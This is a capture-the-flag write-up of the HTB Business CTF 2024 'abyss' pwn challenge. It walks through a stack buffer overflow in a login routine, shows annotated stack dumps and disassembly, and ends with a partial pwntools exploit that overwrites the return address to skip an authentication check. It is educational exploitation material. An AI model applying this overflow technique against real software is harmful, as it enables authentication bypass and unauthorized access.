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HTB Business CTF 2024 - pwn - abyss


There is a byte copy in cmd_login() that copies until 00 and our input is not terminated after read, so there is a stack buffer overflow. The trick is that the index i is also in the path of the overwrite so we can jump over RBP to write on RET and not corrupt it.

This challenge was marked easy (34 solves).

The task #

You can download the source code of the challenge here. main just reads the valid user and pass combination from the .creds file to global variables and then waits for our command. READ command allows us to read a file on the server (flag.txt), but only if the global logged_in variable is not 0. LOGIN command allows us to provide a username and a password. If they match the ones that were read previously, logged_in is set to 1.

Exploit #

The vulnerability is present in cmd_login() function.

void cmd_login()
    char pass[MAX_ARG_SIZE] = {0};
    char user[MAX_ARG_SIZE] = {0};
    char buf[MAX_ARG_SIZE];
    int i;

    memset(buf, '\0', sizeof(buf));
    if (read(0, buf, sizeof(buf)) < 0)

    if (strncmp(buf, "USER ", 5))

    i = 5;
    while (buf[i] != '\0')
        user[i - 5] = buf[i];
    user[i - 5] = '\0';

    memset(buf, '\0', sizeof(buf));
    if (read(0, buf, sizeof(buf)) < 0)

    if (strncmp(buf, "PASS ", 5))

    i = 5;
    while (buf[i] != '\0')
        pass[i - 5] = buf[i];
    pass[i - 5] = '\0';

    if (!strcmp(VALID_USER, user) && !strcmp(VALID_PASS, pass))
        logged_in = 1;
        puts("Successful login");

It reads the user input to a zeroed 512 byte long buffer buf. Then copies it to user buffer until it sees a \0 byte. The problem with this is, that if we send exactly 512 non-zero bytes to read, when the cycle reaches the last byte of buf, it won't stop, because the next byte (the first byte of user) is not 00, it's the copied first byte of buf. So the copy won't stop here. Actually it wouldn't ever stop if it wasn't for i.

7ffd4317cc50: 5553 4552 2061 6161 6161 6161 6161 6161  USER aaaaaaaaaaa    <- buf
7ffd4317cc60: 6161 6161 6161 1c6b 6b6b 6b6b 6b6b 6b6b  aaaaaa.kkkkkkkkk
7ffd4317cc70: 6b6b eb14 4000 0000 0000 0000 0000 0000  kk..@...........
7ffd4317cc80: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317ce40: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317ce50: 0000 0000 0000 0000 0000 0000 0000 0000  ................    <- user
7ffd4317d040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317d050: 0000 0000 0000 0000 0000 0000 0000 0000  ................    <- pass
7ffd4317d240: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317d250: b8e3 1743 fd7f 0000 e0d2 6157 0500 0000  ...C......aW....    <- i (last 4 bytes)
7ffd4317d260: 90e2 1743 fd7f 0000 ba17 4000 0000 0000  ...C......@.....

As you can see, i is 12 bytes after pass. (those 12 bytes are not used they are just skipped for alignment) The copy operation is the same for pass. So our exploit sequence is: Insert specific data in buf (more on this later). This gets copied to user. So our stack looks like this, after buf gets cleared:

7ffd4317cc50: 0000 0000 0000 0000 0000 0000 0000 0000  ................    <- buf
7ffd4317ce40: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317ce50: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa    <- user
7ffd4317ce60: 611c 6b6b 6b6b 6b6b 6b6b 6b6b 6beb 1440  a.kkkkkkkkkkk..@
7ffd4317ce70: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317d040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317d050: 0000 0000 0000 0000 0000 0000 0000 0000  ................    <- pass
7ffd4317d240: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317d250: b8e3 1743 fd7f 0000 e0d2 6157 0500 0000  ...C......aW....    <- i (last 4 bytes)
7ffd4317d260: 90e2 1743 fd7f 0000 ba17 4000 0000 0000  ...C......@.....

Next, we fill buf with all non-zero bytes. As you can see, the first 00 byte is at 7ffd4317ce70 in the user array. When buf gets copied to pass, the content from user+5 (all the as) (+5 because PASS will be stripped from buf) will overwrite bytes starting from 7ffd4317ce70.

7ffd4317cc50: 5041 5353 2062 6262 6262 6262 6262 6262  PASS bbbbbbbbbbb    <- buf
7ffd4317cc60: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
7ffd4317ce40: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
7ffd4317ce50: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa    <- user
7ffd4317ce60: 611c 6b6b 6b6b 6b6b 6b6b 6b6b 6beb 1440  a.kkkkkkkkkkk..@
7ffd4317ce70: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317d040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317d050: 0000 0000 0000 0000 0000 0000 0000 0000  ................    <- pass
7ffd4317d240: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317d250: b8e3 1743 fd7f 0000 e0d2 6157 0500 0000  ...C......aW....    <- i (last 4 bytes)
7ffd4317d260: 90e2 1743 fd7f 0000 ba17 4000 0000 0000  ...C......@.....

The first non-a (1c) will overwrite the lowest byte of i. So let's view the stack right before the overwrite.

7ffd4317cc50: 5041 5353 2062 6262 6262 6262 6262 6262  PASS bbbbbbbbbbb    <- buf
7ffd4317cc60: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
7ffd4317ce40: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
7ffd4317ce50: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa    <- user
7ffd4317ce60: 611c 6b6b 6b6b 6b6b 6b6b 6b6b 6beb 1440  a.kkkkkkkkkkk..@
7ffd4317ce70: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317d040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317d050: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb    <- pass
7ffd4317d230: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
7ffd4317d240: 6262 6262 6262 6262 6262 6261 6161 6161  bbbbbbbbbbbaaaaa
7ffd4317d250: 6161 6161 6161 6161 6161 6161 1102 0000  aaaaaaaaaaaa....    <- i (last 4 bytes)
7ffd4317d260: 90e2 1743 fd7f 0000 ba17 4000 0000 0000  ...C......@.....

As you can see the current value of i is 0x211, this is the offset of the next write from 7ffd4317d050 (-5), so the next write is at 7ffd4317d050 + 0x211 - 5 = 7ffd4317d25c right on top of i itself!. So with the next byte (1c), we are going to overwrite the lowest byte of i, to "jump over" i and RBP and perform the next write at 7ffd4317d268, the return address. This is after the overwrite:

7ffd4317cc50: 5041 5353 2062 6262 6262 6262 6262 6262  PASS bbbbbbbbbbb    <- buf
7ffd4317cc60: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
7ffd4317ce40: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
7ffd4317ce50: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa    <- user
7ffd4317ce60: 611c 6b6b 6b6b 6b6b 6b6b 6b6b 6beb 1440  a.kkkkkkkkkkk..@
7ffd4317ce70: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317d040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317d050: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb    <- pass
7ffd4317d230: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
7ffd4317d240: 6262 6262 6262 6262 6262 6261 6161 6161  bbbbbbbbbbbaaaaa
7ffd4317d250: 6161 6161 6161 6161 6161 6161 1c02 0000  aaaaaaaaaaaa....    <- i (last 4 bytes)
7ffd4317d260: 90e2 1743 fd7f 0000 ba17 4000 0000 0000  ...C......@.....

So now, the next write will be at 7ffd4317d050 + 0x21c + 1 - 5 = 7ffd4317d268 (the +1 is the i++ after the write). This is what the stack looks like at the end of pass copy:

7ffd4317cc50: 5041 5353 2062 6262 6262 6262 6262 6262  PASS bbbbbbbbbbb    <- buf
7ffd4317cc60: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
7ffd4317ce40: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
7ffd4317ce50: 6161 6161 6161 6161 6161 6161 6161 6161  aaaaaaaaaaaaaaaa    <- user
7ffd4317ce60: 611c 6b6b 6b6b 6b6b 6b6b 6b6b 6beb 1440  a.kkkkkkkkkkk..@
7ffd4317ce70: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317d040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
7ffd4317d050: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb    <- pass
7ffd4317d230: 6262 6262 6262 6262 6262 6262 6262 6262  bbbbbbbbbbbbbbbb
7ffd4317d240: 6262 6262 6262 6262 6262 6261 6161 6161  bbbbbbbbbbbaaaaa
7ffd4317d250: 6161 6161 6161 6161 6161 6161 2002 0000  aaaaaaaaaaaa ...    <- i (last 4 bytes)
7ffd4317d260: 90e2 1743 fd7f 0000 eb14 4000 0000 0000  ...C......@.....

As you can see we overwrote the return address to 0x4014eb, right after the check of logged_in in cmd_read():

// EAX = 14 at this point
004014eb 85 c0           TEST       EAX,EAX
004014ed 75 11           JNZ        LAB_00401500
004014ef 48 8d 3d        LEA        RDI,[s_Not_logged_in_00402021]                   = "Not logged in"
          2b 0b 00 00
004014f6 e8 15 fc        CALL                                  int puts(char * __s)
          ff ff
004014fb e9 b3 00        JMP        LAB_004015b3
          00 00

Now all we need to do is send flag.txt and that's it.

Here is the full exploit code:

from pwn import *
from pwnlib.util.cyclic import cyclic_gen
from pwnlib.util.fiddling import enhex, xor
from struct import pack

p = None

def run():
    global p
    chall = "./abyss"
    context.binary = chall
    context.log_level = 'debug'
    p = process(chall)
#    p = remote("", "58350")
    elf = ELF(chall)
#    libc = ELF("")

    g = cyclic_gen()
    RET = b'\xeb\x14\x40' # 0x401485
    payload = b'a'*(0x5+0xc)
    payload += b'\x1c' + b'k'*(0xb) + RET
    p.send(b'USER ' + payload)

    p.send(b'PASS ' + b'b'*(0x200-5))


if __name__ == "__main__":

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